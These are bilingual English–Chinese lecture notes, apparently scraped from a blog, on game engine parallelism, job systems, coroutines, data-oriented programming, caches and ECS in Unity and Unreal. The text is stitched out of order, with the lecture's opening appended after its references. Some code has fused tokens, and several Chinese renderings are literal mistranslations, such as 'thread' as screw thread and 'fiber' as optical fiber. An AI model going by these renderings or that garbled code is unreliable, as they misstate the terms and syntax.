    Out-of-order Execution by CPUs

    CPU 执行顺序错误

    For different CPU

    适用于不同的 CPU

    • The optimization strategy are significantly different

      优化策略明显不同

    • Provides different types of memory order guarantees

      提供不同类型的内存顺序保证

    • Parallel programs require different processing

      并行程序需要不同的处理

    webp

    ​有些 CPU 不保证执行顺序。导致有些代码在平台 A 运行正常,但在平台 B 运行异常。

    Parallel Framework of Game Engine

    游戏引擎的并行框架

    Fixed Multi-thread

    固定多线程

    One fixed thread for each part of the game engine logic

    游戏引擎逻辑的每个部分都有一个固定线程

    • Render, Simulation, Logic, Network, and etc.

      渲染、模拟、逻辑、网络等

    • Easy to implement

      易于实施

    webp

    Issues with Fixed Multi-thread

    已修复的多线程问题

    • The workload is unbalanced among threads (cores)

      线程(核心)之间的工作负载不平衡

    • Unscalable while there are more processor cores

      当有更多处理器内核时,无法缩放

    webp

    ​还是容易出现其它核心陪跑的情况。

    Thread Fork-Join

    螺纹叉连接

    Fork-join for data-parallelizable work (based on fixed multi-thread)

    用于数据并行工作的分叉连接(基于固定多线程)

    • Use a thread pool to prevent frequent thread creation/destruction

      使用线程池来防止频繁的线程创建/销毁

    webp

    Problems with Thread Fork-Join

    螺纹叉连接问题

    • Not easy for logic programmers (work split, work threads count)

      逻辑程序员不容易(工作拆分、工作线程计数)

    • Too many threads can bring performance overhead on context switch

      太多的线程会给上下文切换带来性能开销

    • The workload is still unbalanced among threads (cores)

      线程(核心)之间的工作负载仍然不平衡

    webp

    Unreal Parallel framework

    虚幻并行框架

    Two types of threads

    两种类型的螺纹

    • Named Thread

      命名线程

      • Created by other systems and attached to parallel framework

        由其他系统创建并附加到并行框架

    • Worker Thread

      工人线程

      • Three priorities: high, middle and low

        三个优先事项:高、中、低

      • The number is determined by the number of CPU cores

        该数量由 CPU 内核的数量决定

    webp

    Taskgraph

    任务图

    A directed acyclic graph

    有向无环图

    • Node→Task

      节点→任务

    • Edge→Dependency

      边缘→依赖

    webp

    通过链接构建任务图

    webp

    Job System

    任务系统

    Coroutine

    协程

    Allows for multitaskingby creating jobs that run inside of coroutines

    通过创建在协程内运行的任务,允许多任务处理

    • Coroutine is a lightweight execution context (include a user provided stack, registers…)

      协程是一个轻量级的执行上下文(包括用户提供的堆栈、寄存器等)

      • Execution is collaborative, means a coroutine can switch to another interactively

        执行是协作的,意味着协程可以交互式地切换到另一个协程

    webp

    Coroutine vs. Thread

    webp

    Coroutine

    协程

    • Scheduled by programmers

      由程序员安排

    • To be executed within a thread

      在线程内执行

    • Context switch is faster without kernel switch

      无需内核切换,上下文切换速度更快

    Thread

    线程

    • Scheduled by operating system

      按操作系统计划

    • Resides in a process

      过程中的残留物

    • Context switch is costly with kernel switch

      内核切换的上下文切换成本很高

    Stackful Coroutine

    堆叠式协程

    Coroutine owns an independent runtime stack which is reserved after yield

    Coroutine 拥有一个独立的运行时堆栈,该堆栈在 yield 后保留

    • Enable to yield from within a nested stackframe

      允许在嵌套的堆栈框架内屈服

    • Use local variables just like normal functions

      像普通函数一样使用局部变量

    webp

    ​在 C++ 中,yield() 通常用于多线程编程中,来让出当前线程的执行权。具体来说,它的作用取决于你使用的线程库或框架。以下是几种常见的使用情况:

    1. std::this_thread::yield()(在 C++11 及以后的版本中):

      • 这是 C++ 标准库中的一个函数,声明在 <thread> 头文件中。

      • std::this_thread::yield() 使当前线程暂停执行,并允许其他同等优先级的线程有机会运行。它通常用于在多线程环境中优化资源使用,尤其是在忙等待的情况下。

      • 示例代码:

        cppCopy Code#include <iostream>
        #include <thread>

        void worker() {
        for (int i = 0; i < 10; ++i) {
        std::cout << "Working...\n";
        std::this_thread::yield(); // 让出线程执行权
        }
        }

        int main() {
        std::thread t(worker);
        t.join();
        return 0;
        }
    2. std::experimental::coroutine_handle::yield_value()(在 C++20 协程中):

      • 在 C++20 中,协程引入了更复杂的机制,如 std::experimental::coroutine_handle::yield_value(),用于协程的挂起和恢复。
      • 这允许在协程中挂起执行,并在之后恢复,提供了更高级的控制流功能。

    ​在使用 yield() 时,需要注意它不会阻塞当前线程,而只是提示调度器当前线程愿意暂停执行。调度器将决定是否实际暂停当前线程以及何时恢复它。yield() 是一种建议,具体的调度行为取决于底层操作系统的线程调度策略。

    ​总的来说,yield() 用于提高多线程程序的效率,避免在某些情况下导致不必要的资源占用或提高线程的响应性。

    Stackless Coroutine

    无堆栈协程

    Coroutine has no independent runtime stack to be reserved when yield

    Coroutineyield 时没有要保留的独立运行时堆栈

    • Only the top-levelroutine may yield (subroutines have no idea where to return without stack)

      只有顶层例程可能会产生结果(子程序不知道在没有堆栈的情况下返回哪里)

    • The data that is required to resume execution should be stored separately from the stack

      恢复执行所需的数据应与堆栈分开存储

    webp

    Stackful vs. Stackless Coroutine

    堆叠式与无堆叠式协程

    Stackful Coroutine

    堆叠式协程

    • More powerful with enable to yield from within a nested stackframe

      更强大,支持从嵌套堆栈框架中屈服

    • Needs more memory to reserve stacks for each coroutine

      需要更多内存为每个协程保留堆栈

    • Coroutine context switch takes more time

      子程序上下文切换需要更多时间

    Stackless Coroutine

    无堆栈协程

    • Unable to yield from within a subroutine

      无法从子例程中屈服

    • More difficult to use without a stack to reserve data

      如果没有堆栈来保留数据,则更难使用

    • No extra memory needed for coroutine’s stack

      协程堆栈不需要额外的内存

    • Faster context switch

      更快的上下文切换

    Fiber-based Job System

    基于光纤的任务系统

    Allows for multitasking by creating jobs instead of threads

    通过创建任务而不是线程来实现多任务处理

    • Fiber is like coroutine except that fiber is scheduled by a scheduler

      光纤类似于协程,只是光纤是由调度器调度的

    • Thread is the execution unit while fiber is the context

      线程是执行单元,光纤是上下文

      • One thread for each processor core to minimize the context switch overhead

        每个处理器核心一个线程,以最大限度地减少上下文切换开销

    • Job is executed within the context of a fiber

      任务在光纤上下文中执行

    webp

    One Work Thread for One Core

    一个核心对应一个工作线程

    To minimize the overhead of thread context switch

    尽量减少线程上下文切换的开销

    • Multiple work threads for a single core still suffers from context switch

      单个核心的多个工作线程仍然受到上下文切换的影响

    • One work thread for each core eliminates context switch

      每个核心都有一个工作线程,消除了上下文切换

    webp

    Fiber-based Job System

    基于光纤的任务系统

    • Thread is the execution unit while fiber is the context

      线程是执行单元,光纤是上下文

    • Job is executed within a fiber

      任务在光纤内执行

    webp

    Job Scheduler -Global Job

    LIFO and FIFO Mode

    LIFO 和 FIFO 模式

    • Schedule Model

      计划模型

      • First In First Out (FIFO)

        先进先出(FIFO)

      • Last In First Out (LIFO)

        后进先出(LIFO)

    • LIFO Mode

      • In most case, job dependency is tree like

        在大多数情况下,工作依赖性是树状的

      • Some system add jobs occasionally but wait them immediately

        有些系统偶尔会添加任务,但会立即等待

    Job Scheduler -Job Dependency

    Job Scheduler -Job Stealing

    Pros and Cons of Job System

    Pros

    • Easy to implement task schedule

      易于实施的任务计划

    • Easy to handle task dependency

      易于处理任务依赖关系

    • Job stack is isolated

      任务堆栈是隔离的

    • Avoid frequency context switch

      避免频率上下文切换

    Cons

    • C++ does not natively support fiber

      C++ 本身不支持光纤

    • Implementation is different between OS

      操作系统之间的实现不同

    • Has some restrictions (thread_local invalid)

      有一些限制(thread_local 无效)

    Programming Paradigms

    编程范式

    Procedure-oriented Programming

    面向过程的程序设计

    Object-oriented Programming

    面向对象程序设计

    Programming Paradigm of Game Engine

    游戏引擎的编程范式

    • There are many different programming paradigms

      有许多不同的编程范式

    • Inpractice, some paradigms are widely used

      在实践中,一些范式被广泛使用

    • Programming languages aren’t always tied to a specific paradigm

      编程语言并不总是与特定的范式联系在一起

    webp

    Procedural Oriented Programming (POP)

    面向过程编程(POP)

    • Follows a step-by-step approach to break down a task into a collection of variables and routines (or subroutines) through a sequence of instructions

      遵循循序渐进的方法,通过一系列指令将任务分解为变量和例程(或子程序)的集合

    • Impossible to write a game engine in this way

      无法以这种方式编写游戏引擎

      • Data is not well maintained.

        数据没有得到很好的维护。

      • A co-relation with real-world objects is difficult

        与现实世界中的物体建立关联是困难的

    Object-Oriented Programming (OOP)

    面向对象程序设计(OOP)

    • Based on the concept of “objects”, which can contain data and code

      基于“对象”的概念,可以包含数据代码

    • It’s natural for human to abstract from real world in an object-oriented way

      人类以面向对象的方式从现实世界中抽象出来是很自然的

    webp

    Problems of OOP : Where to Put Codes?

    面向对象编程的问题:把代码放在哪里?

    webp

    ​当攻击者击中对象时,是执行 Attacker.doDamageTo() 还是 Victim.receiveDamage()

    ​当玩家接触敌人时,是执行 Player.attachTo() 还是 Enemy.isAttached()

    Problems of OOP:Method Scattering in Inheritance Tree

    面向对象程序的问题:继承树中的方法分散

    • Hard to know which parent class has the method implementation

      很难知道哪个父类有方法实现

    webp

    ​为了找到玩家攻击敌人的代码逻辑,有可能从继承树中套好几层才找到代码。

    Problems of OOP : Messy Based Class

    面向对象编程的问题:基于混乱的类

    classENGINE_API AActor: publicUObject
    {
    ...
    constFTransform&GetTransform() const;
    constFTransform&ActorToWorld() const;
    FVectorGetActorForwardVector() const;
    FVectorGetActorUpVector() const;
    FVectorGetActorRightVector() const;
    virtualvoidGetActorBounds(...) const;
    virtualFVectorGetVelocity() const;
    floatGetDistanceTo(constAActor*OtherActor) const;
    virtualvoidSetActorHiddenInGame(boolbNewHidden);
    boolGetActorEnableCollision() const;
    boolHasAuthority() const;
    UActorComponent*AddComponent(...);
    voidAttachToActor(...);
    voidDetachFromActor(constFDetachmentTransformRules&DetachmentRules);
    boolGetTickableWhenPaused();
    boolIsActorInitialized() const;
    voidReceiveAnyDamage(...);
    voidGetOverlappingActors(...) const;
    virtualvoidSetLifeSpan(floatInLifespan);
    virtualvoidSerialize(FArchive&Ar) override;
    virtualvoidPostLoad() override;
    ...
    }

    Parts of methods of a “messy base class”

    “混乱的基层”的部分方法(代码可读性差)

    Find some methods in common? Put it to the base class! → We get a messy base class

    找到一些共同的方法吗?把它放在基层阶级!→ 我们得到了一个混乱的基础阶级

    This is not the best OO design, and it certainly is possible to make a better one.
    But also, often code ends up being like this, even if no one wanted it that way.

    这不是最好的 OO 设计,当然有可能做出更好的 OO 设计。
    但是,即使没有人希望这样,代码最终也往往是这样的。

    Problems of OOP : Performance

    面向对象编程的问题:性能

    • Memory scattering

      记忆散射

    • Jungle of virtual functions

      虚拟功能丛林

    webp

    ​面向对象编程可能导致运行时地址分散,Cache 命中率低,性能差。

    Problems of OOP : Testability

    面向对象编程的问题:可测试性

    • Unit Testing

      单元测试

      • OO designs often need a lot of setup to test

        OO 设计通常需要大量的设置来测试

    webp

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    Processor-Memory Performance Gap

    处理器内存性能差距

    • Performance of memory grows much slowly than processor

      内存的性能增长速度比处理器慢

    • The gap is even larger which make memory becomes the main bottleneck of performance CPU

      差距更大,使内存成为性能 CPU 的主要瓶颈

    webp

    The Evolution of Memory -Cache

    内存缓存的演变

    Add cache to speed up data reading

    添加缓存以加快数据读取速度

    • L1: Ranges between 256KB to no more than 1MB, but even that is sufficient.

      L1:范围在 256KB 到不超过 1MB 之间,但即使这样也足够了。

    • L2: Usually a few megabytes and can go up to 10MB.

      L2:通常为几兆字节,最高可达 10MB。

    • L3: Larger than L1 and L2, varies from 16MB to 64MB, shared between all cores.

      L3:大于 L1 和 L2,大小从 16MB 到 64MB 不等,在所有内核之间共享。

    webp

    Principle of Locality

    地方性原则

    the tendency of a processor to access the same set of memory locations repetitively over a short period of time

    处理器在短时间内重复访问同一组存储位置的趋势

    Spatial Locality

    空间位置

    • The use of data elements within relatively close storage locations

      在相对较近的存储位置内使用数据元素

    webp

    Single instruction multiple data (SIMD)

    单指令多数据(SIMD)

    webp

    LRU (Least Recently Used)

    LRU(最近最少使用)

    • When cache is full, discards the least recently usedcache-linefirst.

      当缓存已满时,首先丢弃最近最少使用的缓存行。

      • Record the “used time” of each cache line

        记录每个缓存行的“使用时间”

      • Discard the most “oldest used” cache lineeach time

        每次丢弃“最旧的已使用”缓存行

      • Update “used time” when access data of cache line

        访问缓存行数据时更新“已用时间”

    webp

    Cache Line

    缓存行

    • Data is transferred between memory and cache inblocks of fixed size (typically 64 bytes), called cache lines or cache blocks.

      数据在固定大小(通常为 64 字节)的内存和缓存块之间传输,称为缓存行或缓存块。

    • A cache can only hold a limited number of lines, determined by the cache size. For example, a 64 kilobyte cache with 64-byte lines has 1024 cache lines.

      缓存只能容纳有限数量的行,由缓存大小决定。例如,具有 64 字节行的 64KB 缓存有 1024 条缓存行。

    • Every time you load any memory at all, you are loading in a full cache line of bytes

      每次加载任何内存时,都会加载一个完整的字节缓存行

    Cache Miss

    未命中缓存

    webp

    • When cahce is full (loaded 4 rows), new rows will replace the oldest one

      当 cahce 已满(加载 4 行)时,新行将替换最旧的行

    • When a elements not in cache, a whole row will be loaded

      当一个元素不在缓存中时,将加载整行

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    1. Datais all we have

    ​我们只有数据

    webp

    ​示例:假设你正在开发一个游戏,并需要处理大量的游戏实体(例如玩家、敌人、NPC 等)。

    ​在面向对象编程(OOP)中,你可能会为每种实体创建一个类,并将属性和方法打包在一起:

    pythonCopy Codeclass Player:
    def __init__(self, x, y):
    self.x = x
    self.y = y

    def move(self, dx, dy):
    self.x += dx
    self.y += dy

    ​而在面向数据编程(DOP)中,你会将实体的属性分开存储,并编写独立的函数来操作这些属性:

    pythonCopy Code  # 使用列表存储所有玩家的位置数据
    player_positions = [(0, 0), (5, 5), (10, 10)]

    def move_player(index, dx, dy):
    x, y = player_positions[index]
    player_positions[index] = (x + dx, y + dy)

    # 移动第一个玩家
    move_player(0, 1, 1)

    ​在这个例子中,player_positions 列表存储所有玩家的位置数据。move_player 函数则直接操作这些数据,不涉及复杂的对象方法。这种方式可以提高性能,尤其是在处理大量数据时,因为它减少了对象的开销,并且更容易进行批量操作和并行处理。

    Instructions are Data Too

    指令也是数据

    webp

    ​Code 和 Data 都是内存中的数据。

    Keep Code and Data Tight in Memory

    保持代码和数据在内存中的紧密性

    • Keep both code and data small and process in bursts when you can

      尽可能保持代码和数据的小规模,并以突发的方式处理

    webp

    Performance-Sensitive Programming

    性能敏感编程

    Reducing Order Dependency

    减少订单依赖

    • The work being done because of a misprediction will have to be undone

      由于预测失误而完成的任务将不得不撤销

    • Never modify variables once they are initially assigned

      一旦变量最初被赋值,就永远不要修改它们

    webp

    These 2 parts of code will not be excuted in parallel

    这两部分代码不会并行执行

    because variables a & b is used before

    因为之前使用了变量 a 和 b

    webp

    Compiler allow these 2 parts of code to execute in parallel

    编译器允许这两部分代码并行执行

    Actually, compiler use static single-assignment (SSA) to deal with simple situation like this

    实际上,编译器使用静态单赋值(SSA)来处理这样的简单情况

    False Sharing in Cache Line

    缓存行中的错误共享

    • Ensuring any rapidly updated variables are kept local to the thread

      确保任何快速更新的变量都保持在线程的本地

    • Cache contension

      缓存争议

    webp

    Branch prediction

    分支预测

    • CPU will prefetch instructions and data ahead

      CPU 将提前预取指令和数据

    • Use branch prediction technics to decide what to prefetch

      使用分支预测技术来决定预取什么

    webp

    • To avoid branch mis-prediction

      避免分支预测错误

    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for(int i = 0; i < 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果代码跳着执行,则 Cache 容易未命中,降低运行速度。

    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for(int i = 0; i< 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果事先将序列排序好,代码就不会跳着执行。

    Existential Processing

    存在加工

    for actor in actor_array do
    if actor is alive then
    aliveFunc(actor)
    else
    deadFunc(actor)
    end
    end

    This code also faces branch prediction problems

    此代码还面临分支预测问题

    Unlike the example before, actor_array changes every tick

    与前面的示例不同,actor_array 每一刻都会发生变化

    for actor in alive_actor_array do
    aliveFunc(actor)
    end

    for actor in dead_actor_array do
    deadFunc(actor)
    end

    Completely avoid “if-else”

    完全避免“if-else”

    By maintaining 2 lists of different actors, we could avoid branch mis-precondition

    通过维护 2 个不同参与者的列表,我们可以避免分支预处理错误

    Performance-Sensitive Data Arrangements

    性能敏感数据安排

    Reducing Memory Dependency

    减少内存依赖

    • (chained memory lookups/accesses by pointers)

    (通过指针进行链式内存查找 / 访问)

    webp

    • Load the first cache line 1

      加载第一个缓存行 1

    • Get the next node address

      获取下一个节点地址

    • Cache miss

      缓存未命中

    • Unload the old one, and load another cahce line 2

      卸下旧的,再加载另一个 Cache 线 2

    • Repeating

      重复

    Array of Structure vs. Structure of Array

    数组的结构与结构的数组

    webp

    webp

    ​SOA 的地址排列要比 AOS 更连续。

    If we want to read the position of all particles, SOA has better performance

    如果我们想读取所有 particles 的位置,SOA 的性能更好。

    Entity Component System (ECS)

    实体组件系统(ECS)

    Recap: Component-based Design

    回顾:基于组件的设计

    webp

    • Code example

      代码示例

    webp

    Entity Component System (ECS)

    实体组件系统(ECS)

    A pattern to structure game code in a data-oriented way for maximum performance

    一种以面向数据的方式构建游戏代码以获得最大性能的模式

    • Entity: an ID refer to a set of components

      实体:ID 指一组组件

    • Component: the data to be processed by systems, no logic at all

      组件:系统要处理的数据,根本没有逻辑

    • System: where the logic happens, read/write component data

      系统:逻辑发生的地方,读/写组件数据

    webp

    Unity Data-Oriented Tech Stack (DOTS)

    面向 Unity 数据的技术栈(DOTS)

    A combination of technologies that work together to deliver a data-oriented approach to coding

    结合多种技术,共同提供面向数据的编码方法

    • The Entity Component System (ECS) provides data-oriented programming framework

      **实体组件系统(ECS)**提供面向数据的编程框架

    • The C# Job System provides a simple method of generating multithreaded code

      C# 任务系统提供了一种生成多线程代码的简单方法

    • The Burst Compiler generates fast and optimized native code

      Burst 编译器生成快速且优化的本机代码

    webp

    Unity ECS – Archetype

    A specific combination of components

    Archetype 是组件的特定组合

    • Entities are grouped into archetypes

      实体被分组到 archetype 中

    webp

    Unity ECS –Data Layout in Archetype

    Unity ECS——Archetype 中的数据布局

    Same components in an archetype are packed tightly into chunks for cache friendliness

    原型中的相同组件被紧密地打包成块,以便于缓存

    • A chunk is a block of memory with fixed size, i.e. 16KB

      块是固定大小的内存块,即 16KB

    webp

    Unity ECS –System

    Unity ECS——系统

    webp

    public class MoveSystem: SystemBase
    {
    protected override void OnUpdate()
    {
    // For each entity which has Translation and Velocity
    Entities.ForEach(
    // Write to Displacement (ref), read Velocity (in)
    (refTranslationtrans, inVelocityvelocity) =>
    {
    // Execute for each selected entity
    trans = newTranslation()
    {
    // dT is a captured variable
    Value = trans.Value + velocity.Value * dT};
    }
    ).ScheduleParallel(); // Schedule as a parallel job
    }
    }

    Unity C# Job System

    Unity C# 任务系统

    Make it easier forusers to write correct multithreaded code

    使用户更容易编写正确的多线程代码

    • A job is a small unit of work that performs a specific task

      作业是执行特定任务的小工作单元

    • Jobs can depend on other jobs to complete before they run

      作业在运行之前可以依赖其他作业来完成

    public struct FirstJob: IJob
    {
    publicvoidExecute()
    {
    ...
    }
    }

    public struct SecondJob: IJob
    {
    public void Execute()
    {
    ...
    }
    }
    varfirst_job = newFirstJob();
    varsecond_job = newSecondJob();

    // execute first_job
    varfirst_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);

    Unity C# Job System–Native Container

    Unity C# 作业系统——原生容器

    A type of shared memory that can be accessed inside jobs

    一种可以在作业内部访问的共享内存

    • Job cannot output result without native container (all data is a copy)

      没有本机容器,作业无法输出结果(所有数据都是副本)

    • Native containers support all safety checks

      本地容器支持所有安全检查

    • Native containers need to be disposed manually

      本地容器需要手动处理

    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a= newNativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();

    Unity C# Job System –Safety System

    Unity C# 作业系统-安全系统

    Support safety checks (out of bounds checks, deallocation checks, race condition checks) for jobs

    支持作业的安全检查(越界检查、取消分配检查、竞争条件检查)

    • Send each job a copy of data it needs to operate on to eliminate the race condition

      向每个作业发送一份它需要操作的数据副本,以消除竞争条件

      • Job can only access blittable data types (reference is invalid)

        作业只能访问 blitable 数据类型(引用无效)

    public struct Job: IJob
    {
    public float a;
    public float b;
    public void Execute()
    {
    ...
    }
    }

    webp

    High-Performance C# and Burst Compiler

    高性能 C# 和 Burst 编译器

    High-Performance C# (HPC#) is a subset of C#

    高性能 C#(HPC#)是 C# 语言的一个子集

    • Give up on most of the standard library (StringFormatter, List, Dictionary, and etc.)

      放弃大部分标准库(StringFormatter、List、Dictionary 等)

    • Disallow allocations, reflection, the garbage collector and virtual calls

      不允许分配、反射、垃圾收集器和虚拟调用

    Burst Compiler translates from IL/.NET bytecode to highly optimized native code using LLVM

    Burst 编译器从 IL/ 转换而来。使用 LLVM 将 NET 字节码转换为高度优化的本机代码

    • Generate expected machine code for specific platforms

      为特定平台生成预期的机器代码

    webp

    Unreal Mass Framework

    webp

    MassEntity–Entity

    MassEntity–实体

    • FMassEntityHandle is pure ID as ECS Entity

      FMassEntityHandle 是 ECS 实体的纯 ID

    • Index indicates the index in Entities array in FMassEntityManager

      索引表示 FMassEntityManager 中实体数组中的索引

    • SerialNumberas salt to Index

      序列号作为索引的盐

      • Release an old entity

        释放旧实体

      • Create a new entity with the same Index

        使用相同的索引创建新实体

      • SerialNumberis increased so the ID will be different

        序列号增加,因此 ID 将不同

    struct FMassEntityHand1e
    {
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
    }
    struct MASSENTITY_API FMassEntityManager
    {
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
    }

    MassEntity–Component

    MassEntity——组件

    • Same as Unity, each type of entity has an Archetype

      与 Unity 相同,每种类型的实体都有一个原型

    • Fragments and tagsare componentsfor entities

      片段和标记是实体的组成部分

    • Tags are constant Boolean components to filter unnecessary processing

      标签是用于过滤不必要处理的常量布尔组件

    struct FMassArchetypeCompositionDescriptor
    {
    ...
    FMassFragmentBitSetFragments;
    FMassTagBitSetTags;
    FMassChunkFragmentBitSetChunkFragments;
    FMassSharedFragmentBitSetSharedFragments;
    }

    webp

    MassEntity–Systems

    MassEntity——系统

    • ECS Systems in MassEntity are Processor sderived from UMassProcessor

      MassEntity 中的 ECS 系统是从 UMassProcessor 派生的处理器

    • Two important interface: ConfigureQueries() and Execute(...)

      两个重要的接口:ConfigureQueries()Execute(…)

    class MASSENTITY_API UMassProcessor: publicUObject
    {
    ...
    protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
    FMassEntityManager&EntityManager,
    FMassExecutionContext&Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
    }

    MassEntity–Fragment Query

    MassEntity——片段查询

    • Interface ConfigureQueries() runs when the processor is initialized

      处理器初始化时,接口 ConfigureQueries() 运行

    • Use FMassEntityQuery to filter archetypes of entities meeting systems requirements

      使用 FMassEntityQuery 筛选满足系统要求的实体原型

    • FMassEntityQuery caches filtered archetypes to accelerate future executions

      FMassEntityQuery 缓存经过筛选的原型以加速未来的执行

    webp

    void UMassApplyMovementProcessor::ConfigureQueries()
    {
    EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
    EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
    }

    MassEntity–Execute

    MassEntity——执行

    webp

    Conclusions

    结论

    Everything You Need Know About Performance

    关于性能,你需要知道的一切

    webp

    ​这张图展示了 CPU 各种操作所耗的时间。

    References

    Cache

    Parallel Programming

    Parallel Frameworks in Game Engine

    DOP

    Unity DOTS

    Unreal Engine Mass Architecture

    Multimedia Material List

    ]]>
    + 资源

    课程

    第二十节:现代游戏引擎架构:面向数据编程与任务系统

    Code Execution Is Not As Simple As It Looks

    代码执行并不像看起来那么简单

    Code is executed on top of specific hardware and operating system

    代码在特定硬件和操作系统上执行

    • Hardware and OS must be considered if we want to write a high performance program

      如果我们想编写高性能程序,就必须考虑硬件和操作系统

    webp

    Basics of Parallel Programming

    并行程序设计基础

    Ceiling of Moore’s Law and Multi-Cores

    摩尔定律的上限与多核

    • The number of transistors in a dense integrated circuit (IC) doubles about every two years

      密集集成电路(IC)中的晶体管数量大约每两年翻一番

    • In these years, chip densities are no longerdoubling every two years

      这些年来,芯片密度不再每两年翻一番

    • Multi-coreprocessorbecomes the new industry trend

      多核处理器成为新的行业趋势

    webp

    ​处理器的精度和频率的提升达到了一个瓶颈,添加更多核心成为提升处理器性能的一个趋势。

    Process and Thread

    进程和线程

    Process

    进程

    • The instance of an application (or program)

      应用程序(或程序)的实例

    • Has its own individual region of memory

      有自己的内存空间

    Thread

    线程

    • Preemptive multitasking

      先发制人的多任务处理

    • The smallest unit of task that can be scheduled by OS

      操作系统可以调度的最小任务单元

    • Must reside in a process

      必须驻留在进程中

    • Threads in the same process share the same region of memory

      同一进程中的线程共享同一内存区域(处理不好容易出 bug)

    webp

    Types of Multitasking

    多任务处理的类型

    webp

    Preemptive Multitasking

    先发制人的多任务处理

    • Currently executing task can be interrupted at a time decided by the scheduler

      当前正在执行的任务可以在调度程序决定的时间中断

    • Scheduler determines which task to be executed next

      调度器确定下一个要执行的任务

    • Applied in most operating systems

      适用于大多数操作系统

    webp

    Non-preemptive Multitasking

    非抢占式多任务处理

    • Tasks must be explicitly programmed to yield control

      任务必须明确编程以实现控制

    • Tasksmust cooperate for the scheduling scheme to work

      任务必须配合调度方案才能发挥作用

    • Currently many real-time operating systems (RTOS) also support this kind of scheduling

      目前,许多实时操作系统(RTOS)也支持这种调度

    Thread Context Switch

    线程上下文切换

    Store the state of a thread and resume the execution at a later point

    存储线程的状态,并在稍后恢复执行

    • State including registers, stack and other OS required data

      状态,包括寄存器、堆栈和其他操作系统所需的数据

    • Thread context switch implies extra user-kernel mode switch

      线程上下文切换意味着额外的用户内核模式切换

    • Cache invalidation after context switch has even more cost

      上下文切换后缓存失效的成本更高

    webp

    Cache invalidation may takes 10,000~1,000,000 cycles

    缓存失效可能需要 10000~1000000 个周期

    Parallel Problems in Parallel Computing

    并行计算中的并行问题

    Embarrassingly Parallel Problem (or Perfectly Parallel)

    易并行计算问题(或完全平行问题)

    • Little or no dependency or need for communication between parallel tasks

      并行任务之间很少或不需要通信

    webp

    Monte Carlo algorithm is a typical example of embarrassingly parallel

    蒙特卡洛算法是易并行计算问题的典型例子(使用多线程计算蒙特卡洛积分)

    Non-embarrassingly Parallel Problem

    非尴尬的平行问题

    • Communication is needed between parallel tasks

      并行任务之间需要通信

    webp

    Data Race in Parallel Programming

    并行编程中的数据竞争

    Multiple threads in a single process access the same memory location concurrently

    单个进程中的多个线程同时访问同一内存位置

    • Atleast one of the accesses is for writing

      至少有一个入口是用于写作的

    1
    2
    3
    4
    while(job_count < 100) {
    doSomething();
    job_count++;
    }
    • Read job_count

      读取 job_count

    • Compute job_count +1

      计算任务计数 +1

    • Write new job_count

      任务计数

    webp

    Blocking Algorithm -Locking Primitives

    阻塞算法-上锁

    Lock

    • Only one thread can acquire the lock at a time

      一次只能有一个线程获取锁

    • Make a critical sectionfor shared resource access

      创建共享资源访问的关键部分

    webp

    Only one thread can do this part of code in the same time

    只有一个线程可以同时执行这部分代码

    Other Issues with Locks

    锁的其他问题

    • Thread suspending and resuming will bring performance overhead

      线程挂起和恢复将带来性能开销

    • Suspending threads never get resumed if the thread that acquires the lock exits abnormally

      如果获取锁的线程异常退出,则挂起的线程永远不会恢复

    • Priority Inversion

      优先级反转

      • A higher priority task attempts to acquire the lock that is already acquired by a lower priority task

        较高优先级的任务试图获取较低优先级任务已经获取的锁

    webp

    Atomic Operation : Lock-free Programming

    原子操作:无锁编程

    Atomic Loads and Stores

    原子负载和存储

    • Load: Load data from shared memory to either a register or thread-specific memory

      加载:将数据从共享内存加载到寄存器或线程特定内存

    • Store: Move data into shared memory

      存储:将数据移动到共享内存中

    Atomic Read-Modify-Write (RMW)

    原子读修改写(RMW)

    • Test and Set: Set 1 to shared memory and return the previous value

      测试和设置:将 1 设置为共享内存并返回上一个值

    • CompareandSwap (CAS): Update the data in shared memory if it equals an expected value

      比较和交换(CAS):如果共享内存中的数据等于预期值,则更新该数据

    • Fetch and Add: Add a value to the data in shared memory and return the previous value

      提取并添加:向共享内存中的数据添加一个值,并返回上一个值

    webp

    C++11 和 C++20 提供了原子操作的语句。

    Lock Free vs. Wait Free

    webp

    • wait-free:不管 OS 如何调度线程,每个线程始终在做有用的事情。

    • lock-free:不管 OS 如何调度线程,至少有一个线程在做有用的事情。

    Compiler Reordering Optimizations

    编译器重新排序优化

    webp

    ​编译器将高级语言汇编成汇编语言时,有可能进行优化操作修改代码的执行顺序,这在单线程中不会有变化,但在多线程中可能出现奇怪情况。

    Problem of Memory Reordering

    内存重新排序问题

    • Compilers and CPUs often modify the execution order of instructions to optimize performance

      编译器和 CPU 经常修改指令的执行顺序以优化性能

    • It’s the hard part of parallel programming

      这是并行编程的难点

    webp

    assert 是 C/C++ 中的一个宏,用于在运行时检查一个条件是否为真。如果条件不满足,则运行时将终止程序的执行并输出一条错误信息。

    ​如果 Thread 1 进行了编译器优化,则 Thread 2 可能不会在 assert(a==2); 处抛出错误。

